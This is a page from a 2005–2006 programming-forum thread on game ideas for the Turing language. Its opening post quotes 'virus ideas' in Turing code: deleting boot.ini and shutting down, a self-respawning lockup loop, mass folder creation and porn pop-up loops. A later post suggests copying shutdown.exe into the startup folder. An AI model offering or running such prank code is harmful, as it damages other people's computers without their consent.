Programming C, C++, Java, PHP, Ruby, Turing, VB
Computer Science Canada 
Programming C, C++, Java, PHP, Ruby, Turing, VB  

Username:   Password: 
 RegisterRegister   
 GAME IDEAS- Check Here First if you need some!!!!
Index -> Programming, Turing -> Turing Help
Goto page Previous  1, 2, 3 ... 8, 9, 10, 11, 12  Next
View previous topic Printable versionDownload TopicSubscribe to this topicPrivate MessagesRefresh page View next topic
Author Message
theguru




PostPosted: Sun Dec 11, 2005 2:53 pm   Post subject: (No subject)

Martin wrote:
Virus Ideas.
-Make a program that deletes boot.ini and turns off your computer.
code:
Dir.Change ("C:\\")
File.Delete("boot.ini")
put Sys.Exec ("C:\\Windows\\Shutdown.exe")
%Goodbye computer

-Make a program that runs itself. Over and over and over (you've got to compile it to do this)
code:
loop
    put Sys.Exec ("ThisFile.Exe")
end loop

Your computer will lock up like a nervous virgin on prom night.
-Make a bunch of folders
code:
Dir.Change("C:\\")
for i:1..maxint
    Dir.Create (intstr(i))
end for


-Fun with pop up windows.
code:
var site : array 1..whatever of string := init ("www.porn.com", a bunch more porn sites)
loop
   if Sys.Exec (site (Rand.Int(1,upper(site)))) then
   end if
end loop



Make a collection of these for an...'alternet' ISU Twisted Evil


That's what you call genius, using a pathetic programming language into a dangerous one. lol.
Sponsor
Sponsor
Sponsor
sponsor
Dan




PostPosted: Sun Dec 11, 2005 9:30 pm   Post subject: (No subject)

I think only ur last one whould realy do much, the ones that copy files whould work in theroy but it whould take forever to do any real damge since the file is so small. I do not blive the 1st one will work at all and none of thess are techaly virus but rather just mascives progames.
Computer Science Canada Help with programming in C, C++, Java, PHP, Ruby, Turing, VB and more!
MysticVegeta




PostPosted: Fri Dec 16, 2005 4:48 pm   Post subject: (No subject)

The one line prank which will tick you off so bad you will want to hit yuor computer:

File.Copy ("C:/WINDOWS/system32/shutdown.exe","startup folder")
Unisyst




PostPosted: Thu Dec 22, 2005 8:09 am   Post subject: (No subject)

Those 'pranks' are easily repairable by popping in the Window's CD then going into the Recovery Console.

Also a good 'game' idea would be a side-scroller engine.
ZeroPaladn




PostPosted: Mon Jan 09, 2006 2:33 pm   Post subject: (No subject)

BOMBERMAN!

lolz its been a long time since ive posted here, or anywhere on compsci for that matter...
(O_o)




PostPosted: Fri Jan 13, 2006 7:23 pm   Post subject: (No subject)

currently i'm doing a game like riden where asteroids come down from the screen and you have to shoot them, but every time you shoot the next one comes faster.

another idea would be a game like Znax
where you have to match objects in a row according to their similar colors.
ZeroPaladn




PostPosted: Mon Jan 16, 2006 10:20 am   Post subject: (No subject)

also known as bejeweled Smile ive got it on my cell phone.
Rasta Fella




PostPosted: Wed Jan 18, 2006 7:14 pm   Post subject: (No subject)

Make Maze Type Game for beginner Turing Users.
-Using 'whatdotcolour'
-Combination of different levels
-Password Textfields
-Instruction,Credits etc.

Simple Game for beginner programmers.
Sponsor
Sponsor
Sponsor
sponsor
Clayton




PostPosted: Tue Jan 24, 2006 2:00 am   Post subject: (No subject)

connect four
simple board game
yahtzee
pac-man
pokemon type game
press a key and the screen changes color (lolz)
battleship
easy rpg (couple battles, some movement)

these are fairly simple, ive done most of them
Mazer




PostPosted: Sat Mar 04, 2006 10:32 pm   Post subject: (No subject)

http://katamaridamacy.jp/qa_data/katamari.html

'nuff said.
TokenHerbz




PostPosted: Fri Mar 10, 2006 8:50 pm   Post subject: (No subject)

I sucsessfully made a beta RPG: Which needs the intro fixed / and more maps: But other then that its good, kinda short... Im still testing so ill post it in a few weeks maybe, i might want to add more to it... maybe...

Or i might make a space shooting dodge game or balmor man...
Cervantes




PostPosted: Fri Mar 10, 2006 10:13 pm   Post subject: (No subject)

TokenHerbz wrote:
I sucsessfully made a beta RPG: Which needs the intro fixed / and more maps: But other then that its good, kinda short... Im still testing so ill post it in a few weeks maybe, i might want to add more to it... maybe...

I highly recommend anyone thinking of making an RPG to think again, unless you know classes and object oriented programming, object interaction, and inheritence and polymorphism..
TokenHerbz




PostPosted: Tue Apr 04, 2006 5:17 pm   Post subject: (No subject)

cervantes, i didn't use class's :S

i used everything else though Smile

if you want to see it, just ask, ill show you what iv'e done so far.
Cervantes




PostPosted: Tue Apr 04, 2006 8:37 pm   Post subject: (No subject)

TokenHerbz wrote:
cervantes, i didn't use class's :S

You should have. Smile

How obfuscated was your code? With OOP, even huge programs can be nice and clean.
Clayton




PostPosted: Mon Aug 07, 2006 5:26 pm   Post subject: (No subject)

someone try and re-create Forces Very Happy and dont PM windsurfer for the source either...
Display posts from previous:   
   Index -> Programming, Turing -> Turing Help
View previous topic Tell A FriendPrintable versionDownload TopicSubscribe to this topicPrivate MessagesRefresh page View next topic

Page 9 of 12  [ 177 Posts ]
Goto page Previous  1, 2, 3 ... 8, 9, 10, 11, 12  Next
Jump to:   


Style:  
Search: